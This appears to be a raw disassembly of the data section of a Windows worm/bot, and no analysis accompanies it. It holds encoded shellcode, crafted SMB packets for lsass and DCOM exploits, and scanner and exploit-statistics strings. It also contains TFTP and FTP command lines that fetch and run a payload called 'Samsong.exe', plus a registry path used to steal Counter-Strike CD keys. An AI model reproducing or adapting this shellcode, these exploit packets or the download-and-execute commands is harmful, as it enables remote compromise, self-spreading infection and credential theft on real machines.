db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 45h ; E
db 3 dup(45h)
db 0E9h ; é
db 0F3h, 0FDh, 0FFh
db 0FFh
aEeeeeeeeeeeeee db 'EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE',0
dword_434D88 dd 7C54144Ch ; DATA XREF: .text:004018AE�o
dword_434D8C dd 77A1B496h, 77EDA1F0h, 77A1AFA9h, 41414141h, 77FCC662h
; DATA XREF: .text:00401898�o
aTftpFileTran_0 db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: .text:00401992�o
align 4
aSExploitingI_0 db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: .text:004019DF�o
align 4
dd 4B5B10EBh, 0B966C933h, 34800125h, 0FAE2990Bh, 0EBE805EBh
dd 70FFFFFFh, 99999962h, 0A938FDC6h, 12999999h, 0E91295D9h
dd 0F1123485h, 0F36E1291h, 271C09Dh, 7B999999h, 0ABAAF160h
dd 0EEF19999h, 0CDC6ABEAh, 71128F66h, 71C09DF3h, 9999991Bh
dd 7518607Bh, 99999809h, 9898F1CDh, 0CF669999h, 0C9C9C989h
dd 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h, 0F1989999h, 4B9D999Bh
dd 89F35512h, 0CF66CAC8h, 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh
dd 0CD751AA9h, 0F3BDA514h, 7B32C08Ch, 0BDDD5F64h, 0DD67DD89h
dd 0C510A4BDh, 0C510D1BDh, 0C510D5BDh, 0DD14C9BDh, 0C9CD89BDh
dd 0F3C8C8C8h, 66C8C898h, 66C8A9EFh, 55129DCFh, 0A86666F3h
dd 0CA91CF66h, 6685CF66h, 0CFC895CFh, 12A5DC12h, 9AE1B1CDh
dd 0EB12CB4Ch, 0AA6C9AB9h, 34D8D050h, 42AA5C9Ah, 0A3892796h
dd 5891ED4Fh, 439A9452h, 0A26872D9h, 0C37EEC86h, 9ABDC312h
dd 9512FF44h, 85C312D2h, 9D12449Ah, 325C9A12h, 715AC0C7h
dd 66666699h, 7597D717h, 8F2A67EBh, 579C4034h, 0F9795776h
dd 0A2657452h, 346C9040h, 0F9336075h, 0E05FE07Eh, 0
dword_434F28 dd 4A5A10EBh, 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh
; DATA XREF: sub_401B9B+156�o
; sub_401B9B+212�o
dd 70FFFFFFh, 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h
dd 0D9123485h, 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h
dd 8DD71262h, 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h
dd 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh
dd 589A7848h, 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh
dd 125A9A99h, 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh
dd 0CB945F1Ah, 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h
dd 0F3C9C9C9h, 669BF398h, 411275CEh, 999B9E5Eh
dword_434FD8 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_401B9B+105�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_4350C0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_401FDA+76�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_43514C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401FDA+A2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_4351F8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401FDA+C9�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dword_435230 dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
db 0
byte_435249 db 3 dup(0) ; DATA XREF: .data:off_43E080�o
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4352D8 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B9B+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_2: ; DATA XREF: sub_401B9B+8A�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_43533C dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B9B+2AA�o
; .data:004439C8�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_4353A8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B9B+2D1�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_43544C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B9B+3B0�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_4354CC dd offset loc_401495 ; DATA XREF: sub_401B9B+3DE�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_435560 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B9B+306�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_4355CC dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_401B9B+331�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_435640 dd 0 ; DATA XREF: sub_401B9B+35F�o
dd offset loc_40A896+4
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A896+4
dd 1, 0
dd 1, 0
dd offset loc_40A896+4
dd 1, 0
dd 1, 0
dd offset loc_40A896+4
dd 1, 0
dd 1, 2 dup(0)
word_4356C8 dw 0AD9Dh ; DATA XREF: sub_401A3C+30�r
; sub_401B9B+E7�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_435708 dd 1004600h ; DATA XREF: sub_401B9B+140�r
; sub_401B9B+245�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_401A3C+97�o
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get Samsong.exe >> o'
; DATA XREF: sub_401A3C+BC�o
db ' &echo quit >> o &ftp -n -s:o &Samsong.exe',0Dh,0Ah,0
align 4
aS_0 db '%s',0Dh,0Ah,0 ; DATA XREF: sub_401A3C+100�o
align 4
dword_43584C dd 1CEC8166h ; DATA XREF: sub_401B9B+D�r
dword_435850 dd 0E4FF07h ; DATA XREF: sub_401B9B+16�r
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401B9B+27�o
align 10h
dword_435860 dd 6EB06EBh, 0 ; DATA XREF: sub_401B9B+177�o
aSExploitingI_1 db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: sub_401FDA+16E�o
align 8
dword_435888 dd 4A5A10EBh, 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh
; DATA XREF: .text:00402313�o
; .text:00402395�o
dd 70FFFFFFh, 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h
dd 0D9123485h, 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h
dd 8DD71262h, 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h
dd 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh
dd 589A7848h, 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh
dd 125A9A99h, 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh
dd 0CB945F1Ah, 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h
dd 0F3C9C9C9h, 669BF398h, 411275CEh, 999B9E5Eh
dword_435938 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: .text:004022E5�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_435A20 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:004024B9�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_0 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_0 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_0 db ' LM 0.12',0
align 4
dword_435AAC dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004024E5�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_435B58 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040250C�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_435C38 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040223C�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_3: ; DATA XREF: .text:0040226E�o
unicode 0, <C$>,0
a?????_0 db '?????',0
dd 0
dword_435C9C dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00402560�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_435D08 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040258B�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_435DAC dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004025C4�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_435E2C dd offset loc_401495 ; DATA XREF: .text:004025F2�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_435EC0 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040261F�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_435F2C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040264A�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_435FA0 dd 0 ; DATA XREF: .text:00402678�o
dd offset loc_40A896+4
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A896+4
dd 1, 0
dd 1, 0
dd offset loc_40A896+4
dd 1, 0
dd 1, 0
dd offset loc_40A896+4
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_436060 dd 1004600h ; DATA XREF: .text:0040234F�r
; .text:0040237F�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch
dword_4360DC dd 1CEC8166h ; DATA XREF: .text:004021B2�r
dword_4360E0 dd 0E4FF07h ; DATA XREF: .text:004021BD�r
aSIpc_0 db '\\%s\ipc$',0 ; DATA XREF: .text:00402208�o
align 10h
dword_4360F0 dd 6EB06EBh, 0 ; DATA XREF: .text:004023B6�o
aTftpISGetSSExi db 'tftp -i %s get %s&%s&exit',0Ah,0 ; DATA XREF: .text:00402783�o
align 4
aSTryingSploitI db '[%s]: Trying Sploit IP: %s.',0 ; DATA XREF: .text:004027EB�o
aAsn1smbnt db 'asn1smbnt',0 ; DATA XREF: sub_403076+164�o
aDcom135 db 'Dcom135',0 ; DATA XREF: sub_4013F1+2DD�o
; .text:004019D3�o ...
align 4
dd 5 dup(0)
dword_436158 dd 87h ; DATA XREF: sub_402853+1E�r
; sub_40C50A+30BD�r ...
off_43615C dd offset sub_4013F1 ; DATA XREF: sub_403076+1E6�r
dword_436160 dd 0 ; DATA XREF: sub_4013F1+332�w
; sub_4013F1+338�r ...
dword_436164 dd 1 ; DATA XREF: sub_402994+1F�r
dword_436168 dd 1 ; DATA XREF: sub_402994:loc_402C05�r
aDcom445 db 'dcom445',0
dd 63440000h, 34346D6Fh, 35h, 5 dup(0)
dd 1BDh, 4013F1h, 0
dd 2 dup(1), 6D6F6364h, 35323031h, 63440000h, 30316D6Fh
dd 3532h, 5 dup(0)
dd 401h, 4013F1h, 0
dd 2 dup(1), 6D6F6364h, 32h, 63440000h, 326D6Fh, 6 dup(0)
dd 87h, 401790h, 0
dd 2 dup(1), 316E7361h, 626D73h, 736C0000h, 5F737361h
dd 353434h, 5 dup(0)
dd 1BDh, 401FDAh, 0
dd 2 dup(1), 73616364h, 73h, 63640000h, 737361h, 6 dup(0)
dd 1BDh, 401737h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 1BDh, 401FDAh, 0
dd 2 dup(1), 0Fh dup(0)
aLsass_139 db 'lsass_139',0
byte_43631A db 1 ; DATA XREF: sub_40C50A:loc_4113E4�r
; sub_40C50A+4EE4�o
aDcom1025 db 'dcom1025',0
dd 63640100h, 737361h, 0
dd 61736C01h, 345F7373h, 1003534h, 6D6F6364h, 32h, 10000h
dd 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h
aScanExploitSta db '[SCAN]: Exploit Statistics:',0 ; DATA XREF: sub_402853+11�o
aSD db ' %s: %d,',0 ; DATA XREF: sub_402853+42�o
align 4
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_402853+81�o
align 10h
aScanCurrentIpS db '[SCAN]: Current IP: %s.',0 ; DATA XREF: sub_40291D+2C�o
aScanScanNotAct db '[SCAN]: Scan not active.',0 ; DATA XREF: sub_40291D+42�o
align 4
aTftpServerStar db '[TFTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_402994+DB�o
align 10h
aTftpFailedToSt db '[TFTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_402994+149�o
align 10h
aFtpServerStart db '[FTP]: Server started on Port: %d, File: %s, Request: %s.',0
; DATA XREF: sub_402994+1FA�o
align 4
aFtpFailedToSta db '[FTP]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_402994+267�o
aHttpdServerLis db '[HTTPD]: Server listening on IP: %s:%d, Directory: %s\.',0
; DATA XREF: sub_402994+307�o
aHttpdFailedToS db '[HTTPD]: Failed to start server, error: <%d>.',0
; DATA XREF: sub_402994+36F�o
align 10h
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_402D70+38�o
aSocketOpenFail db 'socket open failed',0 ; DATA XREF: .text:00402F9E�o
align 10h
aSendtoSocketFa db 'sendto() socket failed. sent = %d <%d>.',0 ; DATA XREF: .text:00402FD5�o
aRecvfromSocket db 'recvfrom() socket failed',0 ; DATA XREF: .text:0040302F�o
align 4
aSocketOpen_ db 'Socket open.',0 ; DATA XREF: .text:00403054�o
align 4
aSocketClosed_ db 'Socket closed.',0 ; DATA XREF: .text:loc_403064�o
align 4
aScanIpSDScanTh db '[SCAN]: IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_403076+93�o
aScanIpSPortDIs db '[SCAN]: IP: %s, Port %d is open.',0 ; DATA XREF: sub_403076+EB�o
align 4
aScanFailedToIn db '[SCAN]: Failed to initialize critical section.',0
; DATA XREF: sub_40328A+87�o
align 4
aScanSDScanThre db '[SCAN]: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; DATA XREF: sub_40328A+103�o
aScanFailedToSt db '[SCAN]: Failed to start worker thread, error: <%d>.',0
; DATA XREF: sub_40328A+173�o
aScanFinishedAt db '[SCAN]: Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_40328A+1CE�o
align 4
aAliasList db '-[Alias List]-',0 ; DATA XREF: sub_403569+10�o
align 4
aD_SS db '%d. %s = %s',0 ; DATA XREF: sub_403569+35�o
a_2d_2d4d_2d_2d db '[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s',0 ; DATA XREF: sub_4035E1+60�o
align 4
aLogs db '-[Logs]-',0 ; DATA XREF: .text:0040369D�o
align 4
aLogsCleared_ db '[LOGS]: Cleared.',0 ; DATA XREF: sub_40371E+20�o
align 4
aLogsCleared__0 db '[LOGS]: Cleared.',0 ; DATA XREF: sub_40371E:loc_403753�o
align 10h
aLogBegin db '[LOG]: Begin',0 ; DATA XREF: sub_403791+3F�o
align 10h
aLogListComplet db '[LOG]: List complete.',0 ; DATA XREF: sub_403791+DC�o
align 4
dword_4368C8 dd 78h ; DATA XREF: sub_403930+A�r
align 10h
dword_4368D0 dd 80000002h, 43E294h, 80000002h, 43E2C4h, 80000001h, 43E2FCh
; DATA XREF: sub_4038C0+7�o
aDisplay db 'DISPLAY',0 ; DATA XREF: sub_4038C0+63�o
; sub_403948+11�o
aWindow db 'Window',0 ; DATA XREF: sub_403B83+23�o
align 4
aWindow_0 db 'Window',0 ; DATA XREF: sub_403D7C+26�o
align 10h
dd 80000001h
off_436904 dd offset aSoftwareValveC ; DATA XREF: sub_403FBB+C�r
; sub_403FBB+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_436910 dd 2 dup(0) ; DATA XREF: sub_403FBB+26�o
